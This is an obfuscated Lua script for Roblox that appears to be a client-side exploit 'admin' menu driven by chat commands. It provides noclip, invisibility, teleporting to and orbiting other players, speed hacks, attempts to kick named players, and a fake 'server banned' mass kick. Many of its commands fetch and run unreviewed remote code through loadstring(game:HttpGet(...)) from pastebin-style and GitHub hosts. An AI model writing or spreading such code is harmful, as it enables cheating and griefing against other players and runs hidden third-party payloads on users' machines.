--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=game:GetService("Players");local v1=v0.LocalPlayer;local v2=game:GetService("UserInputService");local v3=game:GetService("RunService");local v4=game:GetService("StarterGui");local v5=game:GetService("TweenService");v4:SetCore("SendNotification",{Title="ADMIN SYSTEM",Text="ADMIN ON",Icon="rbxassetid://7733960981",Duration=5});local v6={};local v7={";noclip",";unnoclip",";kick",";tp player",";invisible",";uninvisible",";jerk",";tp tools",";kill",";gh",";orbit",";unorbit",";console",";cmds",";speed",";audio rp",";anim zombie",";seraphic blade",";anim 096",";cmds anim",";bring parts",";1x1x1x1",";shutdown",";fly",";dropkick tools",";fighter anim",";killer anim",";wallhop"};local v8={";anim zombie",";seraphic blade",";anim 096",";fighter anim",";killer anim"};local v9=false;v3.Stepped:Connect(function() if v9 then for v26,v27 in pairs(v1.Character:GetDescendants()) do if (v27:IsA("BasePart") and (v27.CanCollide==true)) then v27.CanCollide=false;end end end end);local function v10(v12) for v24,v25 in pairs(v1.Character:GetDescendants()) do if (v25:IsA("BasePart") and (v25.Name~="HumanoidRootPart")) then v25.Transparency=(v12 and (675.7 -(534 + 141))) or (0 + 0) ;end if v25:IsA("Decal") then v25.Transparency=(v12 and (1 + 0)) or (0 + 0) ;end end end local function v11(v13,v14,v15) local v16=791 -(368 + 423) ;local v17;local v18;local v19;local v20;local v21;local v22;while true do if (v16==(0 -0)) then v17=Instance.new("ScreenGui",v1:WaitForChild("PlayerGui"));v17.Name=v15;v17.ResetOnSpawn=false;v18=Instance.new("Frame",v17);v18.Size=UDim2.new(0 -0 ,841 -541 ,0 + 0 ,368 -(10 + 8) );v18.Position=UDim2.new(0.5 -0 , -(592 -(416 + 26)),0.5 -0 , -175);v16=1 + 0 ;end if (v16==3) then v20.Font=Enum.Font.GothamBold;v20.TextSize=9 + 11 ;v21=Instance.new("ScrollingFrame",v18);v21.Size=UDim2.new(1 -0 ,867 -(550 + 317) ,439 -(145 + 293) , -(70 -20));v21.Position=UDim2.new(430 -(44 + 386) ,285 -(134 + 151) ,1486 -(998 + 488) ,13 + 27 );v21.CanvasSize=UDim2.new(0 -0 ,1990 -(582 + 1408) ,0 + 0 , #v13 * (802 -(201 + 571)) );v16=1142 -(116 + 1022) ;end if (v16==(20 -15)) then v22.Position=UDim2.new(1, -35,0,3 + 2 );v22.TextColor3=Color3.new(1 -0 ,0 -0 ,0 -0 );v22.BackgroundTransparency=860 -(814 + 45) ;v22.Font=Enum.Font.GothamBold;v22.TextSize=796 -(162 + 618) ;v22.MouseButton1Click:Connect(function() v17:Destroy();end);break;end if (v16==(9 -5)) then v21.ScrollBarThickness=3 + 1 ;v21.BackgroundTransparency=1 -0 ;for v60,v61 in ipairs(v13) do local v62=Instance.new("TextLabel",v21);v62.Text=v61;v62.Size=UDim2.new(1 + 0 , -(4 + 6),885 -(261 + 624) ,44 -19 );v62.Position=UDim2.new(1000 -(451 + 549) ,1085 -(1020 + 60) ,1423 -(630 + 793) ,(v60-(3 -2)) * (1414 -(746 + 638)) );v62.TextColor3=Color3.new(1,4 -3 ,1 + 0 );v62.Font=Enum.Font.Gotham;v62.TextSize=48 -34 ;v62.BackgroundTransparency=1748 -(760 + 987) ;end v22=Instance.new("TextButton",v18);v22.Text="X";v22.Size=UDim2.new(1581 -(1535 + 46) ,1943 -(1789 + 124) ,766 -(745 + 21) ,30 + 0 );v16=5;end if (v16==(1 + 1)) then v19.Thickness=1 + 1 ;v20=Instance.new("TextLabel",v18);v20.Text=v14;v20.Size=UDim2.new(2 -1 ,0 + 0 ,0 -0 ,1 + 39 );v20.BackgroundTransparency=1;v20.TextColor3=Color3.new(1 + 0 ,1056 -(87 + 968) ,4 -3 );v16=606 -(268 + 335) ;end if ((1 + 0)==v16) then v18.BackgroundColor3=Color3.fromRGB(320 -(60 + 230) ,67 -37 ,1443 -(447 + 966) );v18.BorderSizePixel=0 + 0 ;v18.Active=true;v18.Draggable=true;v19=Instance.new("UIStroke",v18);v19.Color=Color3.fromRGB(698 -443 ,1902 -(1703 + 114) ,701 -(376 + 325) );v16=2 -0 ;end end end v1.Chatted:Connect(function(v23) v23=v23:lower();if (v23==";noclip") then v9=true;elseif (v23==";unnoclip") then v9=false;elseif v23:match("^;kick") then local v72=0 -0 ;local v73;while true do if (v72==(1251 -(721 + 530))) then v73=v23:split(" ")[1 + 1 ];for v77,v78 in ipairs(v0:GetPlayers()) do if (v78.Name:lower()==v73) then v78:Kick("You were kicked by ADMIN");end end break;end end elseif v23:match("^;tp player") then local v74=0 -0 ;local v75;while true do if (v74==(14 -(9 + 5))) then v75=v23:split(" ")[379 -(85 + 291) ];for v80,v81 in ipairs(v0:GetPlayers()) do if (v81.Name:lower()==v75) then v1.Character:MoveTo(v81.Character.HumanoidRootPart.Position);end end break;end end elseif (v23==";invisible") then v10(true);elseif (v23==";uninvisible") then v10(false);elseif (v23==";jerk") then loadstring(game:HttpGet("https://pastefy.app/wa3v2Vgm/raw"))();elseif (v23==";gh") then loadstring(game:HttpGet("https://raw.githubusercontent.com/GhostPlayer352/Test4/main/GhostHub"))();elseif v23:match("^;orbit") then local v82=1265 -(243 + 1022) ;local v83;local v84;while true do if (v82==(0 -0)) then v83=v23:split(" ")[2 + 0 ];v84=nil;v82=1181 -(1123 + 57) ;end if (v82==(1 + 0)) then for v86,v87 in ipairs(v0:GetPlayers()) do if (v87.Name:lower()==v83) then v84=v87;end end if v84 then coroutine.wrap(function() while wait() do if ( not v84 or (v23==";unorbit")) then break;end v1.Character:MoveTo(v84.Character.HumanoidRootPart.Position + Vector3.new(259 -(163 + 91) ,1930 -(1869 + 61) ,0 + 0 ) );end end)();end break;end end elseif (v23==";console") then print("Console Opened");elseif (v23==";cmds") then v11(v7,"ADMIN CMDS","ADMIN_GUI");elseif v23:match("^;speed") then local v88=0 -0 ;local v89;while true do if (v88==(0 -0)) then v89=tonumber(v23:split(" ")[1 + 1 ]);if v89 then v1.Character.Humanoid.WalkSpeed=v89;end break;end end elseif (v23==";tp tools") then local v90=0 + 0 ;local v91;while true do if (1==v90) then v91.Name="TP Tool";v91.Activated:Connect(function() local v97=v1:GetMouse();if v97 then v1.Character:MoveTo(v97.Hit.Position);end end);v90=1 + 1 ;end if (v90==(2 -0)) then v91.Parent=v1.Backpack;break;end if (v90==(529 -(406 + 123))) then v91=Instance.new("Tool");v91.RequiresHandle=false;v90=1 + 0 ;end end elseif (v23==";kill") then v1.Character:BreakJoints();elseif (v23==";audio rp") then loadstring(game:HttpGet("https://raw.githubusercontent.com/nmalka01/nmalka01/refs/heads/main/Brookhaven_audio"))();elseif (v23==";anim zombie") then loadstring(game:HttpGet("https://pastefy.app/JOWniO6o/raw"))();elseif (v23==";seraphic blade") then loadstring(game:HttpGet("https://pastefy.app/59mJGQGe/raw"))();elseif (v23==";anim 096") then loadstring(game:HttpGet("https://pastefy.app/YsJgITXR/raw"))();elseif (v23==";cmds anim") then v11(v8,"CMDS ANIM","CMD_ANIM_GUI");elseif (v23==";bring parts") then loadstring(game:HttpGet("https://pastebin.com/raw/aZjaAr6F"))();elseif (v23==";1x1x1x1") then loadstring(game:HttpGet("https://rawscripts.net/raw/Universal-Script-1X1X1X1-GUI-MODDED-changed-the-names-and-messages-10246",true))();elseif (v23==";shutdown") then for v100,v101 in pairs(v0:GetPlayers()) do v101:Kick("XPLOIT FORCE This server has been banned\nCode: 01119");end local v98=Instance.new("Sound",workspace);v98.SoundId="rbxassetid://119731837417100";v98:Play();v4:SetCore("SendNotification",{Title="CRASHED",Text="server CRASH!!1!1",Duration=1480 -(1329 + 145) });elseif (v23==";fly") then loadstring(game:HttpGet("https://raw.githubusercontent.com/alifSTARZ/FLY/refs/heads/main/FLY-COMMaNDS"))();elseif (v23==";dropkick tools") then loadstring(game:HttpGet("https://raw.githubusercontent.com/LolnotaKid/JkDropKuck/refs/heads/main/Protected_3923618848403366.txt"))();elseif (v23==";fighter anim") then loadstring(game:HttpGet("https://pastefy.app/wxVAgZpT/raw"))();elseif (v23==";killer anim") then loadstring(game:HttpGet("https://pastefy.app/riYch0rX/raw"))();elseif (v23==";wallhop") then loadstring(game:HttpGet("https://pastefy.app/wa3v2Vgm/raw"))();end end);
